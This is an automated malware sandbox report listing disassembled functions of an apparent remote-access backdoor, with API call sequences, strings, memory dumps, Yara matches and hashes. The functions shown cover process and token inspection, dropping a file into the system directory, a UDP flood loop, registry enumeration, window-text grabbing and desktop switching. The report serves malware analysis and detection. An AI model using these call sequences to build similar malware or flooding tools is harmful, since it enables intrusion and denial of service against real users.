                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: *,$Capture Filter$Grabber$iavs$vids
                                • API String ID: 542301482-3686165303
                                • Opcode ID: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                • Instruction ID: 6b34a01a8f94a52d972c2f63ee6a2cae5e4b6e391ed04b1ad51ace7a22d3cd02
                                • Opcode Fuzzy Hash: 32c67f297ac5bbe3568bbd34cd628c681e99ce76be26e9191f1ffbea16b09f8a
                                • Instruction Fuzzy Hash: 45C126B46047019FD714CF28C894A5AB7EAFF88350F108A5DF99ACB7A1D730E946CB61
                                Function 10012780 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
                                  • Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
                                  • Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
                                  • Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658
                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 100127E5
                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 100127FF
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 10012825
                                • ??2@YAPAXI@Z.MSVCRT(?), ref: 10012832
                                • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 10012854
                                • ??2@YAPAXI@Z.MSVCRT(00000100), ref: 10012876
                                • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000100,?,00000104,?), ref: 100128A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@Token$InformationOpenProcess$AccountCreateFirstLookupProcess32SnapshotToolhelp32_strcmpi
                                • String ID: explorer.exe
                                • API String ID: 2062827286-3187896405
                                • Opcode ID: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                • Instruction ID: 3c6e58a02f97abc338737f091e25ee4c367b19baec1748f45827f9b92fdf04fa
                                • Opcode Fuzzy Hash: 6ae1be46aa6dd37aa1cb4fad1e5e9fefe03301e8bbe20af14b7827fca2362f4d
                                • Instruction Fuzzy Hash: 17411AB1D01228AFDB10DF95DC85BEEBBB9FB48710F10415AF609A7280D7716A84CFA1
                                Function 1000A830 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 103fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 1000A85D
                                  • Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
                                  • Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
                                  • Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
                                  • Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
                                  • Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1000A882
                                • wsprintfA.USER32 ref: 1000A8F7
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 1000A913
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 1000A937
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 1000A93E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$Filewsprintf$??2@??3@CloseCreateDirectoryFindHandleLoadLockSystemWrite
                                • String ID: Ball\$XXXXXX
                                • API String ID: 1973673485-3982136319
                                • Opcode ID: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                • Instruction ID: 495c6c63232d9b85305b454becab353a6f073e9b30b67b104db98610628649c6
                                • Opcode Fuzzy Hash: d0285f27527aa3d9f6c94dda95131b8ba6b821462037fccde0d85b55137da151
                                • Instruction Fuzzy Hash: 5331F63220070427E728CA74CC55BBB7396EBC4721F544B2DF662972C0DEF4AE088695
                                Function 00403E31 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00403E9E
                                • GetStdHandle.KERNEL32(000000F4,00406360,00000000,?,00000000,00000000), ref: 00403F74
                                • WriteFile.KERNEL32(00000000), ref: 00403F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: File$HandleModuleNameWrite
                                • String ID: B$...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                • API String ID: 3784150691-92088503
                                • Opcode ID: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                • Instruction ID: e2e7e3b0d966deab652d805934d5b43aed53a7e34c61163c82d84b1dec86f9c2
                                • Opcode Fuzzy Hash: 1418363ce47fb53e1422872c1821c3fc56e793c3fac4f8efe83855173f2920ce
                                • Instruction Fuzzy Hash: 6731E372A002186EDF20EB62DD46F9A77BCAB85704F50047BFA45F60C0DA78EA418A5D
                                Function 10004BC0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67networksleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,?), ref: 10004BD4
                                • socket.WS2_32(00000002,00000002,00000011), ref: 10004BF1
                                • htons.WS2_32 ref: 10004C1A
                                • inet_addr.WS2_32(1007DD2C), ref: 10004C2A
                                • sendto.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000,?,00000010), ref: 10004C59
                                • Sleep.KERNEL32(00000028,?,00000000,?,00000010,00000002), ref: 10004C62
                                • RtlExitUserThread.NTDLL(00000000), ref: 10004C6F
                                Strings
                                • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 10004BDA, 10004C53
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitSleepStartupThreadUserhtonsinet_addrsendtosocket
                                • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                                • API String ID: 3602400006-4039768343
                                • Opcode ID: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                • Instruction ID: 55386a69bf2c1f1f0394aeb8968783278eab3e70afa46589061ef1ece014295f
                                • Opcode Fuzzy Hash: b7fd58fe7a85b0579cd9239b455f85d4c9d72aaf4c76e786bf3f88592cc7e18c
                                • Instruction Fuzzy Hash: 7C1122701053A16BF300DF30CC89B6A3BA4FF89754F00061EF191972E1EBB49C08872A
                                Function 00404CAB Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00403F55,?,Microsoft Visual C++ Runtime Library,00012010,?,00406360,?,004063B0,?,?,?,Runtime Error!Program: ), ref: 00404CBD
                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00404CD5
                                • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00404CE6
                                • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00404CF3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                • API String ID: 2238633743-4044615076
                                • Opcode ID: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                • Instruction ID: 7a0cc08ec05e3b4d564e92fce98ceeba057a3e0b493a9dfb57db353efca9b8d4
                                • Opcode Fuzzy Hash: 65487e5282e3d4811eb732336b9f14f6fc2d01affe1e7d4a2d5ace8b969641ae
                                • Instruction Fuzzy Hash: E80175B1700211EBD7219FB59C84A2B3AF8ABC4751391043BA602E22A1D6789C66DB6D
                                Function 1000E1E0 Relevance: 13.7, APIs: 9, Instructions: 205registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 1000E1FA
                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 1000E22C
                                • LocalAlloc.KERNEL32(00000040,?), ref: 1000E28B
                                • malloc.MSVCRT ref: 1000E2CC
                                • malloc.MSVCRT ref: 1000E2D7
                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,?,?), ref: 1000E35E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: malloc$AllocEnumInfoLocalOpenQueryValue
                                • String ID:
                                • API String ID: 574313380-0
                                • Opcode ID: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                • Instruction ID: 2dbc490ccdae4f0339eaf1a45c7cb0cbb32c1b4649a87cd96ed82d0427daa14a
                                • Opcode Fuzzy Hash: f68634cb85ce996d8ca971fb5f34a9b34359b1a106f598c3223e6df0ddde21a8
                                • Instruction Fuzzy Hash: E561BE716083559FD318CF28C884A2BBBE9EBC8790F44492CF68AD3350D671EE05CB92
                                Function 10068B90 Relevance: 13.6, APIs: 9, Instructions: 105COMMON
                                Download Yara Rule
                                APIs
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BD8
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068BEE
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C08
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C2A
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C3A
                                • CloseWindow.USER32(?), ref: 10068C49
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C53
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C77
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A29B,000000FF,10068B78), ref: 10068C8E
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??3@$Close$HandleWindow
                                • String ID:
                                • API String ID: 3237098652-0
                                • Opcode ID: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                • Instruction ID: 47ea1eda927b8dc083e930fae728241aa0dc08fd9b84fd6a3200258ce030e435
                                • Opcode Fuzzy Hash: 9de152eaf032b6c019d36165fe0161e4700e84a4955553e3fc30d38c5674a32d
                                • Instruction Fuzzy Hash: F2416BF5600B409FC724CF69C980816B7FAFF89710B458A2DE1468BB11DB35F948CB91
                                Function 10012040 Relevance: 13.6, APIs: 9, Instructions: 73stringmemorysleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextA.USER32(?,?,00000400), ref: 1001206F
                                • IsWindowVisible.USER32(?), ref: 10012076
                                • lstrlen.KERNEL32(?), ref: 1001208F
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 1001209D
                                • lstrlen.KERNEL32(?), ref: 100120AA
                                • Sleep.KERNEL32(00000001), ref: 100120B3
                                • LocalSize.KERNEL32 ref: 100120BA
                                • LocalReAlloc.KERNEL32(?,?,00000042), ref: 100120C9
                                • lstrlen.KERNEL32(?,?,?,00000042), ref: 100120E0
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Locallstrlen$AllocWindow$SizeSleepTextVisible
                                • String ID:
                                • API String ID: 2862634755-0
                                • Opcode ID: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                • Instruction ID: 3dedb17b5f53bc68f4680ffa48498177935556d525806c47c9f4f8922cb1ae20
                                • Opcode Fuzzy Hash: 71c19960e703c33ae2d1a6b21add6958f0f5a92c079f6a1746d4dbd94e46fd60
                                • Instruction Fuzzy Hash: D1215EB2204355ABE714DF64CC85AAB73E9FB88300F414928FB5697240EBB4E949CB65
                                Function 10012980 Relevance: 13.6, APIs: 9, Instructions: 66threadstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012992
                                • GetThreadDesktop.USER32(00000000), ref: 10012999
                                • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129C6
                                • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 100129D1
                                • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 100129FE
                                • lstrcmpiA.KERNEL32(?,?), ref: 10012A0D
                                • SetThreadDesktop.USER32(00000000), ref: 10012A18
                                • CloseDesktop.USER32(00000000), ref: 10012A30
                                • CloseDesktop.USER32(00000000), ref: 10012A33
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                • String ID:
                                • API String ID: 3718465862-0
                                • Opcode ID: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                • Instruction ID: c967bd72d2f0f6242c0139ef5eee9d5da27d55a5de029f67c8097565ae890da2
                                • Opcode Fuzzy Hash: 90be362dbd16c0d3903431b24173b7edbffd7c7a0c9dc00c2e408363fe55b960
                                • Instruction Fuzzy Hash: B2110871104349ABF310DB60CC4AFDB7799EB88700F000829FB4196191EFB4A94986A2
                                Function 004051CE Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                Download Yara Rule
                                APIs
                                • GetStringTypeW.KERNEL32(00000001,0040642C,00000001,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040520D
                                • GetStringTypeA.KERNEL32(00000000,00000001,00406428,00000001,?,?,00000000,00000000,00000001), ref: 00405227
                                • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 0040525B
                                • MultiByteToWideChar.KERNEL32(oD@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,0040446F,00200020,00000000,?,00000000,00000000,00000001), ref: 00405293
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052E9
                                • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 004052FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: StringType$ByteCharMultiWide
                                • String ID: oD@
                                • API String ID: 3852931651-4270158488
                                • Opcode ID: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                • Instruction ID: 4e9507d7fde2c7550347533a2b4aeff6ceb3887050b9cf78e8730f58af229727
                                • Opcode Fuzzy Hash: 094cbf9cb636d95a61da7a826cc7b8ee29b3be9263811f6ed0450c6ecd228496
                                • Instruction Fuzzy Hash: 04416F71640619EFCF209F94DD85DAF3FB8EB08790F10443AF912E6290C37989618FA9
                                Function 10006310 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10006317
                                • gethostbyname.WS2_32(?), ref: 10006323
                                • inet_ntoa.WS2_32(?), ref: 1000634D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 100063BB
                                • CloseHandle.KERNEL32(00000000), ref: 100063BE
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005F50,00000000,00000000,00000000), ref: 100063FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                • Instruction ID: c7197912ff5fd36304896d9e0e4c3c204ad4e708709a044846b952971cfb3809
                                • Opcode Fuzzy Hash: 91b9fa16a84fe6fcd60e97a3d99e1aed4d20b384f66aba2166986545eee1b3ef
                                • Instruction Fuzzy Hash: CD21E1327046155BE328DA389C45B2BB7E3FBC8760F658229FA06E72D4CEF4EC008654
                                Function 10005E50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10005E57
                                • gethostbyname.WS2_32(?), ref: 10005E63
                                • inet_ntoa.WS2_32(?), ref: 10005E8D
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10005EFB
                                • CloseHandle.KERNEL32(00000000), ref: 10005EFE
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005880,00000000,00000000,00000000), ref: 10005F3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID: gfff
                                • API String ID: 772126777-1553575800
                                • Opcode ID: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
                                • Instruction ID: 4bb7b8ee4ec5a65906e8f0a6ea5f30d081eb742cdef018fe392bcbb4b8c5aab5
                                • Opcode Fuzzy Hash: 2b2e48b9233d71c179e8e4256631f78aef2ad198907d8a616f5f70b0b1f53888
